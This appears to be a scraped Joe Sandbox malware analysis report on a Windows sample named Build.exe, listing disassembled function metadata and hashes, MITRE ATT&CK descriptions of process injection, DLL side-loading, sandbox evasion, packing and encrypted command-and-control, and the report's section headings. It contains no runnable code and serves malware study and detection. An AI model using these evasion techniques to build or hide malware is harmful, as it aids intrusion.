Opcode Fuzzy Hash: 58801b25a746f1fc385debebfb80f2873591b027a22349b2f02dd37cd15fb68e
Instruction Fuzzy Hash: 6BD02230701308CFDB288A32B064371338E6B40288F6498ACD50F89282CB37E4A2C310

Function 00CC6253 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd5603e665a284cea1ec4edc4db86131af8f7902729af589821d2d4ed6fc628
Instruction ID: 808b5c8dee5be42f0d87e1b020bf95275f23f2187e93c165ec68a0693f2a0737
Opcode Fuzzy Hash: bcd5603e665a284cea1ec4edc4db86131af8f7902729af589821d2d4ed6fc628
Instruction Fuzzy Hash: B1D012C3C4D1A59FE34203E598357A26FE0D8732D539914DFD082CB56AE14DD146F311

Function 04C6F7A8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8621781957afe5f7ade98ac329f31e30f16b63bd9e1da7ee12cd92ae8c4b9be7
Instruction ID: 80537c77c4313bc6b355d7fff900b7669199b6a064c45b442ccb802af007e955
Opcode Fuzzy Hash: 8621781957afe5f7ade98ac329f31e30f16b63bd9e1da7ee12cd92ae8c4b9be7
Instruction Fuzzy Hash: ABD0C93551060DEFCB41AFA8DC049DD7BB9FF06315F008619FA491A121EB32E5A5EB91

Function 04C6B218 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ffe6e17ec24dda85a94a03a3112ff49de2ab8eeab77734c5ba99e444d4bbf48
Instruction ID: 367bfa13b6af84f645843057040cef53157973de779cb01156b3bba9bf2e101a
Opcode Fuzzy Hash: 1ffe6e17ec24dda85a94a03a3112ff49de2ab8eeab77734c5ba99e444d4bbf48
Instruction Fuzzy Hash: FDC08C302809084BDA182AE17A0832A338CDB40201B4440A1EA0EC1040EA38AC108A60

Function 00CC4160 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e768066fc34963d9c4431b920d344156cd3531710216d6c434d95cbec890a6f
Instruction ID: d928ef079308427ee1a510b656c7ee3e937d93964ca3db9deacaf732e98ed269
Opcode Fuzzy Hash: 2e768066fc34963d9c4431b920d344156cd3531710216d6c434d95cbec890a6f
Instruction Fuzzy Hash: 79C012780193808FCF03AB20AD24A213F32AB83210349C59AE0A166266CB296856CB09

Function 00CC20D9 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1179774e9d76f910d48fd03f922a2abcd6d932238a0f4955e5ef26f575142ee9
Instruction ID: 1a5373b3bf7bca1b3e2db95107ac52b4ad835715052596186aadb8f04254644e
Opcode Fuzzy Hash: 1179774e9d76f910d48fd03f922a2abcd6d932238a0f4955e5ef26f575142ee9
Instruction Fuzzy Hash: F1C02BC560C1C41BE353337D5001F4E3A001FE1309FAB48D9E34046143D40CC4065231

Function 00CC0DD0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32e8ca13d4d19c75cdd2d2b919af2915a509887bc6e165b43624bd732fb2fe6
Instruction ID: abdc8b2668738486639a884a5fff77b55a6ba283093eec75aaa1ca262d2fc969
Opcode Fuzzy Hash: c32e8ca13d4d19c75cdd2d2b919af2915a509887bc6e165b43624bd732fb2fe6
Instruction Fuzzy Hash: B5C04CB148810BDAD7146F99D519B6E7E60A704704F300859D003E5150DBF411545691

Function 04C6D218 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcaa3d5525d51c8c25db8713cd938094ac7108b77a8d7bf947b60e11a1dc0c3b
Instruction ID: 29f7de7195887344d056439051c71616728b9432739347c5fcfdb0765ac89340
Opcode Fuzzy Hash: bcaa3d5525d51c8c25db8713cd938094ac7108b77a8d7bf947b60e11a1dc0c3b
Instruction Fuzzy Hash: 32A02232000300CBCF20AB30820C2083330EA223023000C2AC0030A0008B3A8802CA20

Non-executed Functions

Function 00CCD2B0 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00CCD3C4

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 41bfb09db582922ca38cd1bd9da0abfe9f6fe1e625e75885445c0dc3424ff9a0
Instruction ID: 3b5a8304c5321716534f457ded063058b2ab07f61a96ca4f5174da695f0f9cae
Opcode Fuzzy Hash: 41bfb09db582922ca38cd1bd9da0abfe9f6fe1e625e75885445c0dc3424ff9a0
Instruction Fuzzy Hash: 41D1AD75B002148FCB14EB78C954A6E7BF6EF89300B1584A9E90ADB3A5DF34DD02CB91

Function 04C67028 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e044a91391612ce84c8741c3a90a591070c7a3febb320ab0b6de57f675513ec1
Instruction ID: d789c589fa681081baadc14ec28f2c6d6e366349c8f0cb6481974c4715ef60f9
Opcode Fuzzy Hash: e044a91391612ce84c8741c3a90a591070c7a3febb320ab0b6de57f675513ec1
Instruction Fuzzy Hash: CFC12F657802289BE648A67D4E6433F188F9BCC744F148CA8520EE73EDDD5AED8703E5

Function 04C65611 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1fd0a0abea75ebb458a65fca76126c00977c8e12088d9e6c0d61be1e9bbac02
Instruction ID: 58f04a01684472b40cba0fa2ffc07b89129ae582efdbada8d1d7958c1ab2265d
Opcode Fuzzy Hash: a1fd0a0abea75ebb458a65fca76126c00977c8e12088d9e6c0d61be1e9bbac02
Instruction Fuzzy Hash: F1B19C75B403019FCB249F39949462EBBE3AF85350B25C829D84ACB396DF34ED06CB91

Function 04C66FF6 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4817f8da5fcc322af81c11ac70429fd22cd5246c8a075729c8970d3f9b5f424
Instruction ID: 3755b0b838e37d0867c5138452af24839a58c0ade63afe1ad161cec72e96ef38
Opcode Fuzzy Hash: b4817f8da5fcc322af81c11ac70429fd22cd5246c8a075729c8970d3f9b5f424
Instruction Fuzzy Hash: 84813D557802688FE708A27D0D6433F188F9BCC744F1588A9514EEB3E9DD5AED8B03E6

Function 04C636CB Relevance: 9.0, Strings: 7, Instructions: 222COMMON

Download Yara Rule

Strings

\s^q, xrefs: 04C63885
\s^q, xrefs: 04C637F4
\s^q, xrefs: 04C63755
\s^q, xrefs: 04C6382F
\s^q, xrefs: 04C638ED
\s^q, xrefs: 04C63924
\s^q, xrefs: 04C6378C

Memory Dump Source

Source File: 00000000.00000002.1865239407.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c60000_Build.jbxd

Similarity

API ID:
String ID: \s^q$\s^q$\s^q$\s^q$\s^q$\s^q$\s^q
API String ID: 0-1705958294
Opcode ID: bd2e16be97f0822964ccc348e24a61535b6004f59f44658fdbf04ca18379bbba
Instruction ID: 81a6f5b7017379a8251e135182bf56ef4c8d293b47623835cb1b8ea29badc1f1
Opcode Fuzzy Hash: bd2e16be97f0822964ccc348e24a61535b6004f59f44658fdbf04ca18379bbba
Instruction Fuzzy Hash: 02915A30A00606DFCB04DF28C68496DBBF2BF89304B158969E84A9B776DB30FC45CB90

Function 00CC50A2 Relevance: 7.9, Strings: 6, Instructions: 398COMMON

Download Yara Rule

Strings

(_^q, xrefs: 00CC512A
(_^q, xrefs: 00CC5329
(_^q, xrefs: 00CC542A
(_^q, xrefs: 00CC51A9
(_^q, xrefs: 00CC52AA
(_^q, xrefs: 00CC54A9

Memory Dump Source

Source File: 00000000.00000002.1864124525.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Build.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q
API String ID: 0-2896069617
Opcode ID: 94ad2d4a1e2b3e742af83935f2dfbc0a9bf989d96ef1fefa59c92fcbccbd4ef3
Instruction ID: 6a325939e5af84ff0364fa68e4e6452f8121734e7583a3b37cc8747449e16e8c
Opcode Fuzzy Hash: 94ad2d4a1e2b3e742af83935f2dfbc0a9bf989d96ef1fefa59c92fcbccbd4ef3
Instruction Fuzzy Hash: BFE1DF75B042449FCB159F78C41466E7FB2EF86310B2485AEE806DB382DA35DD46CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Build.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Build.exe